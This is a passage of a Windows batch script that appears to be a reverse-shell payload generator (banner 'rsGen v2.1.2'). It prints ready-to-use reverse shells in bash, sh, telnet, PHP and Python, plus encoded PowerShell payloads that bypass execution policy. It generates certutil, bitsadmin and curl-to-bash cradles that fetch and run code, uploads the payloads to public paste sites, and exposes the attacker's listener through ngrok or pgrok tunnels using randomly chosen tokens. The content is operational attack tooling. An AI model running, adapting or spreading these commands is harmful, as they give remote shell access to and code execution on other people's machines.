| echo + Host:Port ^<==^> %~1:%~2 199 | call :rs_info_w10windows_start 200 | call :rs_windows_command_raw_start %~1 %~2 201 | call :rs_info_w10linux_start 202 | call :rs_linux_command_raw_start %~1 %~2 203 | ) else ( 204 | call :rs_banner_w7_start 205 | echo + Host:Port ^<==^> %~1:%~2 206 | call :rs_info_w7windows_start 207 | call :rs_windows_command_raw_start %~1 %~2 208 | call :rs_info_w7linux_start 209 | call :rs_linux_command_raw_start %~1 %~2 210 | ) 211 | ) 212 | ) 213 | ) 214 | 215 | call :rs_clean_tempfile_start 216 | ) 217 | ) 218 | ) 219 | endlocal 220 | goto :eof 221 | :rs_main_end 222 | 223 | ::Detect system version using ANSI color 224 | :rs_os_detect_start 225 | for /f "tokens=4-7 delims=[]. " %%i in ('ver') do ( 226 | set /a_majorminor=%%i * 100 + %%j 227 | set /a_build=%%k0 /10 228 | set /a_revision=%%l0 /10 229 | ) 230 | set "rs_os_flag=" 231 | if %_majorminor% geq 1000 ( 232 | if %_build% gtr 10586 ( 233 | set rs_os_flag=W10 234 | ) 235 | ) else ( 236 | set rs_os_flag=-1 237 | if %_build% equ 10586 ( 238 | if %_revision% geq 11 ( 239 | set rs_os_flag=W10 240 | ) 241 | ) 242 | ) 243 | :rs_os_detect_end 244 | 245 | ::Check port format 246 | :rs_check_port_start 247 | set rs_value= 248 | set rs_value=%1 249 | echo %rs_value%|findstr "^[0-9]*$">nul 250 | if %errorlevel% equ 0 ( 251 | set rs_value_type=0 252 | ) else ( 253 | set rs_value_type=1 254 | ) 255 | goto :eof 256 | :rs_check_prot_end 257 | 258 | ::Find available ports 259 | :rs_set_webport_start 260 | netstat -o -n -a | find /i "LISTENING" | find ":%rs_webport% " > NUL 261 | if "%ERRORLEVEL%" equ "0" ( 262 | set /a rs_webport +=1 263 | goto rs_set_webport_start 264 | ) else ( 265 | set rs_webport=%rs_webport% 266 | ) 267 | goto :eof 268 | :rs_set_webport_end 269 | 270 | ::base64 encode 271 | :rs_base64_encode_start 272 | set /p"%temp%\rs_temp_input.rsg" 273 | certutil -encodehex -f "%temp%\rs_temp_input.rsg" "%temp%\rs_temp_output.rsg" 0x40000001 >nul 2>nul 274 | FOR /F "delims==" %%i in (%temp%\rs_temp_output.rsg) do (set rsgen_b64_res=%%i) 275 | rem echo "!rsgen_b64_res!" 276 | :rs_base64_encode_end 277 | 278 | ::Clean temporary files 279 | :rs_clean_tempfile_start 280 | if exist "%temp%\rs_temp_input.rsg" del /q %temp%\rs_temp_input.rsg 281 | if exist "%temp%\rs_temp_output.rsg" del /q %temp%\rs_temp_output.rsg 282 | if exist "%temp%\powershell_listener.tmp" del /q %temp%\powershell_listener.tmp 283 | goto :eof 284 | :rs_clean_tempfile_end 285 | 286 | ::Listen to the local port 287 | :rs_local_listen_start 288 | set rs_listen_port=%1 289 | if exist "%cd%\include\wincat.exe" ( 290 | echo + Listening on port 0.0.0.0:!rs_listen_port! 291 | start "Listening port !rs_listen_port!" %cd%\include\wincat.exe -l 0.0.0.0 !rs_listen_port!" 2>nul 292 | ) else ( 293 | powershell -c write-host "' - Unable to start listening,Missing file %cd%\include\wincat.exe'" -f red -n 2>nul 294 | goto :rs_help_start 295 | ) 296 | goto :eof 297 | :rs_local_listen_end 298 | 299 | ::Convert Domain to IP 300 | :rs_domain2IP_start 301 | set rs_domain2ip=%1 302 | for /f "tokens=2" %%i in ('nslookup %1 8.8.8.8 2^>NUL^|findstr /i /V "dns 8.8.8 ngrok"') do ( 303 | set rs_domain2ip=%%i 304 | ) 305 | goto :eof 306 | :rs_domain2IP_end 307 | 308 | ::rs_ngrok 309 | :rs_ngrok_start 310 | echo i Starting ngrok and get the forwarding address,please wait... 311 | if exist "%cd%\include\ngrok.exe" ( 312 | call :rs_random_token_start %cd%\include\rs_ngrok.token 313 | call :rs_random_location_start %cd%\include\rs_ngrok.localation 314 | echo authtoken: !rs_random_token! >%cd%\include\ngrok.yml 315 | echo web_addr: 44480 >>%cd%\include\ngrok.yml 316 | echo region: !rs_random_location! >>%cd%\include\ngrok.yml 317 | start "Expose a TCP based service running on port !rs_listen_port!" cmd /c %cd%\include\ngrok.exe tcp !rs_listen_port! -config=%cd%\include\ngrok.yml 2>nul 318 | set rs_ngrok= 319 | set rs_n=0 320 | FOR /L %%i in (1,1,20) do ( 321 | set /a rs_n=!rs_n!+1 322 | %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:44480/api/tunnels|find /i "ngrok.io" >nul&&set rs_ngrok=0 323 | if !rs_ngrok! == 0 goto :rs_ngrok_host 324 | ) 325 | 326 | :rs_ngrok_host 327 | if !rs_ngrok! == 0 ( 328 | FOR /F "tokens=9 delims==://" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:44480/api/tunnels') do (set rs_ngrok_host=%%i) 329 | FOR /F tokens^=11^ delims^=^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:44480/api/tunnels') do (set rs_ngrok_port=%%i) 330 | 331 | set rs_listen_host=!rs_ngrok_host! 332 | echo + Ngrok tcp tunnel 127.0.0.1:!rs_listen_port! ^<==^> !rs_ngrok_host!:!rs_ngrok_port! 333 | rem echo !rs_ngrok_host! 334 | rem echo !rs_ngrok_port! 335 | rem echo !rs_n! time... 336 | call :rs_domain2IP_start !rs_ngrok_host! 337 | 338 | if not "!rs_domain2ip!" == "" ( 339 | set rs_ngrok_host=!rs_domain2ip! 340 | echo 127.0.0.1:!rs_listen_port! ^<==^> !rs_domain2ip!:!rs_ngrok_port! 341 | ) else ( 342 | echo - Attempt to convert Ngrok domain name to IP failed. 343 | ) 344 | ) 345 | goto :eof 346 | 347 | ) else ( 348 | echo, 349 | powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\ngrok.exe.'" -f red -n 2>nul 350 | goto :rs_help_start 351 | ) 352 | goto :eof 353 | :rs_ngrok_end 354 | 355 | ::Read random token from text 356 | :rs_random_token_start 357 | set i=0 358 | for /f "tokens=*" %%x in (%1) do ( 359 | set line[!i!]=%%x 360 | set /a i += 1 361 | ) 362 | set /a j=%random% %% %i% 363 | set rs_random_token=!line[%j%]! 364 | ::echo !rs_random_token! 365 | goto :eof 366 | :rs_random_token_end 367 | 368 | :rs_random_location_start 369 | set i=0 370 | for /f "tokens=*" %%x in (%1) do ( 371 | set line[!i!]=%%x 372 | set /a i += 1 373 | ) 374 | set /a j=%random% %% %i% 375 | set rs_random_location=!line[%j%]! 376 | ::echo !rs_random_location! 377 | goto :eof 378 | :rs_random_location_end 379 | 380 | :rs_pastebin_api_start 381 | set i=0 382 | for /f "tokens=*" %%x in (%1) do ( 383 | set line[!i!]=%%x 384 | set /a i += 1 385 | ) 386 | set /a j=%random% %% %i% 387 | set rs_pastebin_api=!line[%j%]! 388 | ::echo !rs_pastebin_api! 389 | goto :eof 390 | :rs_pastebin_api_end 391 | 392 | ::rs_pgrok 393 | :rs_pgrok_start 394 | echo i Starting Pgrok and get the forwarding address,please wait... 395 | if exist "%cd%\include\pgrok.exe" ( 396 | start "Expose a TCP based service running on port !rs_listen_port!" cmd /c %cd%\include\pgrok.exe -proto=tcp !rs_listen_port! 2>nul 397 | 398 | set rs_pgrok= 399 | set rs_n=0 400 | FOR /L %%i in (1,1,30) do ( 401 | set /a rs_n=!rs_n!+1 402 | %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in|find /i "ejemplo.me" >nul&&set rs_pgrok=0 403 | if !rs_pgrok! == 0 goto :rs_pgrok_host 404 | ) 405 | 406 | :rs_pgrok_host 407 | if !rs_pgrok! == 0 ( 408 | FOR /F tokens^=11^ delims^=^/^\^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in^|find /i "tcp://"') do (set rs_pgrok_host=%%i) 409 | FOR /F tokens^=12^ delims^=^/^\^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in^|find /i "tcp://"') do (set rs_pgrok_port=%%i) 410 | set rs_listen_host= 411 | set rs_listen_host=!rs_pgrok_host! 412 | echo + Starting the pgrok tcp tunnel 127.0.0.1:!rs_listen_port! ^<==^> !rs_pgrok_host!:!rs_pgrok_port! 413 | rem echo "!rs_pgrok_host!" "!rs_pgrok_port!" 414 | rem echo !rs_n! time... 415 | call :rs_domain2IP_start !rs_pgrok_host! 416 | 417 | if not "!rs_domain2ip!" == "" ( 418 | set rs_pgrok_host=!rs_domain2ip! 419 | echo 127.0.0.1:!rs_listen_port! ^<==^> !rs_domain2ip!:!rs_pgrok_port! 420 | ) else ( 421 | echo i ! Attempt to convert Pgrok domain name to IP failed. 422 | ) 423 | ) 424 | goto :eof 425 | 426 | ) else ( 427 | echo, 428 | powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\pgrok.exe.'" -f red -n 2>nul 429 | goto :rs_help_start 430 | ) 431 | goto :eof 432 | :rs_pgrok_end 433 | 434 | ::Raw command format output 435 | :rs_windows_command_raw_start 436 | set rs_listen_host=%1 437 | set rs_listen_port=%2 438 | call :rs_powershell_listener_payload_start !rs_listen_host! !rs_listen_port! 439 | if "!rs_os_flag!"=="W10" ( 440 | echo  powershell -EP Bypass -NoLogo -NonI -NoP -Enc !powershell_listener_payload! 441 | echo, 442 | ) else ( 443 | echo powershell -EP Bypass -NoLogo -NonI -NoP -Enc '!powershell_listener_payload!' 444 | ) 445 | goto :eof 446 | :rs_windows_command_raw_end 447 | 448 | ::rs_powershell_listener_payload_start 449 | :rs_powershell_listener_payload_start 450 | set powershell_listener_payload= 451 | set rs_powershell_listener_payload_pre= 452 | set rs_powershell_listener_payload_suf= 453 | set /p rs_powershell_listener_payload_pre=<%cd%\payload\powershell_listener_1.payload 454 | set /p rs_powershell_listener_payload_suf=<%cd%\payload\powershell_listener_2.payload 455 | set powershell_listener_payload=!rs_powershell_listener_payload_pre!!rs_listen_host!'',!rs_listen_port!!rs_powershell_listener_payload_suf! 456 | powershell -c "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('!powershell_listener_payload!'))|out-file -Encoding ascii %temp%\powershell_listener.tmp" 2>nul 457 | ::echo !powershell_listener_payload! 458 | ::type %temp%\powershell_listener.tmp 459 | ::set /p powershell_listener_payload=<%temp%\powershell_listener.tmp 460 | for /f "delims= tokens=1,2" %%i in (%temp%\powershell_listener.tmp) do set powershell_listener_payload=%%i 461 | ::echo !powershell_listener_payload! 462 | goto :eof 463 | ::rs_powershell_listener_payload_end 464 | 465 | :rs_linux_command_raw_start 466 | set rs_listen_host=%1 467 | set rs_listen_port=%2 468 | if "!rs_os_flag!"=="W10" ( 469 | echo  bash -i^>^&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0^>^&1 470 | echo, 471 | echo  sh -i^>^&/dev/udp/!rs_listen_host!/!rs_listen_port! 0^>^&1 472 | echo, 473 | echo  0^<^&196;exec 196^<^>/dev/tcp/!rs_listen_host!/!rs_listen_port!; sh ^<^&196 ^>^&196 2^>^&196 474 | echo, 475 | echo  telnet !rs_listen_host! !rs_listen_port!^|/bin/bash^|telnet !rs_listen_host! 1521 476 | ::echo  ps:Need to additionally listen a port 1521 for command output display 477 | echo, 478 | echo  php -r '$sock=fsockopen^("!rs_listen_host!",!rs_listen_port!^);exec^("/bin/sh -i <&3 >&3 2>&3"^);' 479 | echo, 480 | echo  python -c 'import socket,subprocess,os;s=socket.socket^(socket.AF_INET,socket.SOCK_STREAM^);s.connect^(^("!rs_listen_host!",!rs_listen_port!^)^);os.dup2^(s.fileno^(^),0^); os.dup2^(s.fileno^(^),1^);os.dup2^(s.fileno^(^),2^);import pty; pty.spawn^("/bin/bash"^)' 481 | echo, 482 | ) else ( 483 | echo bash -i^>^&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0^>^&1 484 | echo, 485 | echo sh -i^>^&/dev/udp/!rs_listen_host!/!rs_listen_port! 0^>^&1 486 | echo, 487 | echo 0^<^&196;exec 196^<^>/dev/tcp/!rs_listen_host!/!rs_listen_port!; sh ^<^&196 ^>^&196 2^>^&196 488 | echo, 489 | echo telnet !rs_listen_host! !rs_listen_port!^|/bin/bash^|telnet !rs_listen_host! 1521 490 | ::echo ps:Need to additionally listen a port 1521 for command output display 491 | echo, 492 | echo php -r '$sock=fsockopen^("!rs_listen_host!",!rs_listen_port!^);exec^("/bin/sh -i <&3 >&3 2>&3"^);' 493 | echo, 494 | echo python -c 'import socket,subprocess,os;s=socket.socket^(socket.AF_INET,socket.SOCK_STREAM^);s.connect^(^("!rs_listen_host!",!rs_listen_port!^)^);os.dup2^(s.fileno^(^),0^); os.dup2^(s.fileno^(^),1^);os.dup2^(s.fileno^(^),2^);import pty; pty.spawn^("/bin/bash"^)' 495 | echo, 496 | ) 497 | goto :eof 498 | :rs_linux_command_raw_end 499 | 500 | ::LAN "transfer command" generation 501 | :rs_command_lan_start 502 | if not exist "%cd%\include\" ( 503 | echo, 504 | powershell -c write-host "' - Missing include directory,Unable to continue generate command!'" -f red -n >nul 505 | ::Missing the include directory, the include directory contains the files "i" & "pcat.ps1", "i" is the generated command. 506 | goto :rs_help_start 507 | ) 508 | if exist "%cd%\include\mongoose.exe" ( 509 | tasklist|find /i "mongoose.exe">nul&&taskkill /f /im mongoose.exe >nul 2>nul 510 | call :rs_set_webport_start 511 | start %cd%\include\mongoose.exe -d %cd%\include\www -l !rs_webport! -start_browser no -enable_dir_listing no 512 | ) else ( 513 | powershell -c write-host "' - Missing file `"%cd%\include\mongoose.exe`",The web service failed to start`,the LAN mode needs to start the web service locally`,so the command will not be executed effectively'" -f red -n 2>nul 514 | ) 515 | 516 | set rs_ps_command_pre_lan= 517 | set ps_command_suf_raw_lan= 518 | set linux_command_raw_lan= 519 | set rs_ps_command_suf_b64_lan= 520 | set rs_command_b64_lan= 521 | 522 | call :rs_powershell_listener_payload_start 523 | set rs_ps_command_b64=!powershell_listener_payload! 524 | ::echo !rs_ps_command_b64! 525 | 526 | set "rs_ps_command_pre_lan=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc " 527 | set "linux_command_raw_lan=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0>&1" 528 | rem echo !linux_command_raw_lan!.test 529 | call :rs_base64_encode_start "!linux_command_raw_lan!" 530 | set rs_linux_command_b64_lan=%rsgen_b64_res% 531 | set "rs_command_b64_lan=!rs_linux_command_b64_lan!!rs_ps_command_pre_lan!!rs_ps_command_b64!" 532 | echo !rs_command_b64_lan!>%cd%\include\www\i 533 | if not exist "%cd%\include\www\c" ( 534 | copy /y %cd%\payload\c#.payload %cd%\include\www\c >nul 2>nul 535 | ) 536 | 537 | if "!rs_webport!" equ "80" ( 538 | set rs_webport_display= 539 | ) else ( 540 | set "rs_webport_display=:%rs_webport%" 541 | ) 542 | 543 | if "!rs_os_flag!"=="W10" ( 544 | call :rs_info_w10windows_start 545 | echo  bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%^\cd.bat^|cd.bat 546 | echo, 547 | echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/c cd.bat^|cd.bat 548 | echo, 549 | echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat 550 | echo, 551 | echo  powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^ 552 | echo, 553 | echo  powershell -EP Bypass -NoLogo -NonI -NoP -Enc !powershell_listener_payload! 554 | echo, 555 | 556 | call :rs_info_w10linux_start 557 | echo  curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 558 | echo, 559 | echo  wget -qO- http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 560 | echo, 561 | 562 | call :rs_info_wlinux10_start 563 | echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 564 | echo, 565 | echo  bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%\cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 566 | echo, 567 | echo  powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 568 | echo, 569 | ) else ( 570 | call :rs_info_w7windows_start 571 | echo powershell -EP Bypass -NoLogo -NonI -NoP -Enc !powershell_listener_payload! 572 | echo, 573 | echo certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat 574 | echo, 575 | echo powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat 576 | echo, 577 | echo bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%^\cd.bat^|cd.bat 578 | echo, 579 | 580 | call :rs_info_w7linux_start 581 | echo curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 582 | echo, 583 | echo curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 584 | echo, 585 | echo wget -qO- http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 586 | echo, 587 | 588 | call :rs_info_wlinux7_start 589 | echo certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 590 | echo, 591 | echo powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 592 | echo, 593 | echo bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%\cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 594 | echo, 595 | ) 596 | goto :eof 597 | :rs_command_lan_end 598 | 599 | :rs_command_generate_pub_output_windowsw10_start 600 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_base64_payload_url! cd.bat^|cd.bat 601 | echo, 602 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat !rs_listen_host! !rs_listen_port! cmd 603 | echo, 604 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat !rs_listen_host! !rs_listen_port! powershell 605 | echo, 606 | if "!rs_pastebin_status!"=="0" echo  bitsadmin /transfer n !rs_base64_payload_url! %%cd%%\cd.bat^|cd.bat 607 | echo, 608 | if "!rs_pastebin_status!"=="0" echo  powershell "Import-Module bitstransfer;start-bitstransfer !rs_base64_payload_url! cd.bat"^|cd.bat 609 | echo, 610 | goto :eof 611 | :rs_command_generate_pub_output_windowsw10_end 612 | 613 | :rs_command_generate_pub_output_linuxw10_start 614 | if "!rs_pastebin_status!"=="0" echo  curl !rs_base64_payload_url!^|base64 -d^|bash 615 | echo, 616 | if "!rs_pastebin_status!"=="0" echo  wget -qO- !rs_base64_payload_url!^|base64 -d^|bash 617 | echo, 618 | goto :eof 619 | :rs_command_generate_pub_output_linuxw10_end 620 | 621 | :rs_command_generate_pub_output_wl10_start 622 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_base64_payload_url! cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 623 | echo, 624 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 625 | echo, 626 | if "!rs_pastebin_status!"=="0" echo  bitsadmin /transfer n !rs_base64_payload_url! %%cd%%\cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 627 | echo, 628 | if "!rs_pastebin_status!"=="0" echo  powershell "Import-Module BitsTransfer;start-bitstransfer !rs_base64_payload_url! cd.bat"^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 629 | echo, 630 | goto :eof 631 | :rs_command_generate_pub_output_wl10_end 632 | 633 | :rs_command_generate_pub_output_windowsw7_start 634 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_base64_payload_url! cd.bat^|cd.bat 635 | echo, 636 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat !rs_listen_host! !rs_listen_port! cmd 637 | echo, 638 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat !rs_listen_host! !rs_listen_port! powershell 639 | echo, 640 | if "!rs_pastebin_status!"=="0" echo bitsadmin /transfer n !rs_base64_payload_url! %%cd%%\cd.bat^|cd.bat 641 | echo, 642 | if "!rs_pastebin_status!"=="0" echo powershell "Import-Module bitstransfer;start-bitstransfer !rs_base64_payload_url! cd.bat"^|cd.bat 643 | echo, 644 | goto :eof 645 | :rs_command_generate_pub_output_windowsw7_end 646 | 647 | :rs_command_generate_pub_output_linuxw7_start 648 | if "!rs_pastebin_status!"=="0" echo curl !rs_base64_payload_url!^|base64 -d^|bash 649 | echo, 650 | if "!rs_pastebin_status!"=="0" echo wget -qO- !rs_base64_payload_url!^|base64 -d^|bash 651 | echo, 652 | if "!rs_pastebin_status!"=="0" echo wget -qO- !rs_base64_payload_url!^|base64 -d^|bash 653 | echo, 654 | goto :eof 655 | :rs_command_generate_pub_output_linuxw7_end 656 | 657 | :rs_command_generate_pub_output_wl7_start 658 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_base64_payload_url! cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 659 | echo, 660 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 661 | echo, 662 | if "!rs_pastebin_status!"=="0" echo bitsadmin /transfer n !rs_base64_payload_url! %%cd%%\cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 663 | echo, 664 | if "!rs_pastebin_status!"=="0" echo "powershell "Import-Module BitsTransfer;start-bitstransfer !rs_base64_payload_url! cd.bat"|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash" 665 | echo, 666 | goto :eof 667 | :rs_command_generate_pub_output_wl7_end 668 | 669 | ::Command generation 670 | :rs_command_generate_pub_start 671 | set rs_ps_command_suf_b64= 672 | set rs_linux_command_b64= 673 | set rs_command_b64= 674 | set rs_listen_host=%1 675 | set rs_listen_port=%2 676 | set "rs_ps_command_pre=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc " 677 | call :rs_powershell_listener_payload_start 678 | set "linux_command_raw=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0>&1" 679 | call :rs_base64_encode_start "!linux_command_raw!" 680 | set rs_linux_command_b64=%rsgen_b64_res% 681 | set rs_ps_command_suf_b64=!powershell_listener_payload! 682 | ::echo %rs_ps_command_suf_b64% 683 | set "rs_command_b64=!rs_linux_command_b64!!rs_ps_command_pre!!rs_ps_command_suf_b64!" 684 | rem echo !rs_command_b64! 685 | call :rs_command_upload_start !rs_listen_host! !rs_listen_port! 686 | if "!rs_pastebin_status!"=="-1" ( 687 | echo, 688 | powershell -c write-host "' Command upload failed, make sure you can access the internet, check local proxy settings, or make sure the pastebin API is available'" -f red 2>nul 689 | goto :rs_help_start 690 | ) 691 | goto :eof 692 | :rs_command_generate_pub_end 693 | 694 | ::Upload command to pastebin 695 | :rs_command_upload_start 696 | set rs_pastebin_api= 697 | echo i Uploading payload to pastebin,please wait... 698 | call :rs_pastebin_api_start %cd%\include\rs_pastebin.api 699 | rem echo !rs_pastebin_api! 700 | if exist "%cd%\include\curl.exe" ( 701 | set rs_c#_payload_url= 702 | set rs_listen_host=%1 703 | set rs_listen_port=%2 704 | set rs_pastebin_status=0 705 | echo !rs_command_b64!>%cd%\payload\rs_base64.payload 706 | if "!rs_pastebin_api!" == "https://p.ip.fi/" ( 707 | set rs_base64_payload_url= 708 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -s -F "paste=<%cd%\payload\rs_base64.payload" https://p.ip.fi') do (set rs_base64_payload_url=%%i) 709 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -s -F "paste=<%cd%\payload\c#.payload" https://p.ip.fi') do (set rs_c#_payload_url=%%i) 710 | set rs_base64_payload_url=!rs_base64_payload_url!.txt 711 | set rs_c#_payload_url=!rs_c#_payload_url!.txt 712 | ) 713 | 714 | if "!rs_pastebin_api!" == "https://dpaste.com/api/v2/" ( 715 | set rs_base64_payload_url= 716 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -s -F "content=<%cd%\payload\rs_base64.payload" https://dpaste.com/api/v2/') do (set rs_base64_payload_url=%%i) 717 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -s -F "content=<%cd%\payload\c#.payload" https://dpaste.com/api/v2/') do (set rs_c#_payload_url=%%i) 718 | set rs_base64_payload_url=!rs_base64_payload_url!.txt 719 | set rs_c#_payload_url=!rs_c#_payload_url!.txt 720 | ) 721 | 722 | if "!rs_pastebin_api!" == "https://paste.teknik.io/Action/Paste" ( 723 | set rs_base64_payload_url= 724 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -ks -w "%%{redirect_url}" -o nul -F "content=<%cd%\payload\rs_base64.payload" https://paste.teknik.io/Action/Paste') do (set rs_base64_payload_url=%%i) 725 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -ks -w "%%{redirect_url}" -o nul -F "content=<%cd%\payload\c#.payload" https://paste.teknik.io/Action/Paste') do (set rs_c#_payload_url=%%i) 726 | FOR /F "tokens=3 delims==/" %%i in ("!rs_base64_payload_url!") do (set rs_base64_payload_url=%%i) 727 | FOR /F "tokens=3 delims==/" %%i in ("!rs_c#_payload_url!") do (set rs_c#_payload_url=%%i) 728 | set rs_base64_payload_url=https://paste.teknik.io/raw/!rs_base64_payload_url! 729 | set rs_c#_payload_url=https://paste.teknik.io/raw/!rs_c#_payload_url! 730 | ) 731 | 732 | if "!rs_pastebin_api!" == "https://ghostbin.co/paste/new" ( 733 | set rs_base64_payload_url= 734 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -ks -w "%%{redirect_url}" -o nul -F "text=<%cd%\payload\rs_base64.payload" https://ghostbin.co/paste/new') do (set rs_base64_payload_url=%%i) 735 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -ks -w "%%{redirect_url}" -o nul -F "text=<%cd%\payload\c#.payload" https://ghostbin.co/paste/new') do (set rs_c#_payload_url=%%i) 736 | FOR /F "tokens=4 delims==/" %%i in ("!rs_base64_payload_url!") do (set rs_base64_payload_url=%%i) 737 | FOR /F "tokens=4 delims==/" %%i in ("!rs_c#_payload_url!") do (set rs_c#_payload_url=%%i) 738 | set rs_base64_payload_url=https://ghostbin.co/paste/!rs_base64_payload_url!/raw 739 | set rs_c#_payload_url=https://ghostbin.co/paste/!rs_c#_payload_url!/raw 740 | rem echo !rs_base64_payload_url! 741 | rem echo !rs_c#_payload_url! 742 | ) 743 | 744 | ) else ( 745 | echo, 746 | powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\curl.exe.'" -f red -n 2>nul 747 | goto :rs_help_start 748 | ) 749 | 750 | if not !rs_base64_payload_url! == "" ( 751 | echo + Base64 Payload URL: !rs_base64_payload_url! 752 | echo + C# Payload URL: !rs_c#_payload_url! 753 | ) else ( 754 | powershell -c write-host "' ! Attempt to convert Ngrok domain name to IP failed.'" -f red -n 2>nul 755 | ) 756 | 757 | exit /b 0 758 | 759 | 760 | ::banner 761 | :rs_banner_w7_start 762 | echo ______ ________ ____ _____ 763 | echo .' ___ ^|^|_ __ ^|^|_ \^|_ _^| 764 | echo _ .--. .--. / .' \_^| ^| ^|_ \_^| ^| \ ^| ^| 765 | echo [ `/'`\]( (`\]^| ^| ____ ^| _^| _ ^| ^|\ \^| ^| 766 | echo ^| ^| `'.'.\ `.___] ^|_^| ^|__/ ^| _^| ^|_\ ^|_ 767 | echo [___] [\__) )`._____.'^|________^|^|_____^|\____^| v2.1.2 768 | echo, 769 | goto :eof 770 | :rs_banner_w7_end 771 | 772 | :rs_banner_w10_start 773 | echo  ______ ________ ____ _____ 774 | echo  .' ___ ^|^|_ __ ^|^|_ \^|_ _^|  775 | echo  _ .--. .--. / .' \_^| ^| ^|_ \_^| ^| \ ^| ^| 776 | echo  [ `/'`\]( (`\]^| ^| ____ ^| _^| _ ^| ^|\ \^| ^| 777 | echo  ^| ^| `'.'.\ `.___] ^|_^| ^|__/ ^| _^| ^|_\ ^|_ 778 | echo  [___] [\__) )`._____.'^|________^|^|_____^|\____^| v2.1.2 779 | echo, 780 | goto :eof 781 | :rs_banner_w10_end 782 | 783 | :rs_info_w10windows_start 784 | echo  Windows Payload  785 | echo, 786 | goto :eof 787 | :rs_info_w10windows_end 788 | 789 | :rs_info_w7windows_start 790 | powershell -c write-host "' Windows Payload'" -f yellow 2>nul 791 | echo, 792 | goto :eof 793 | 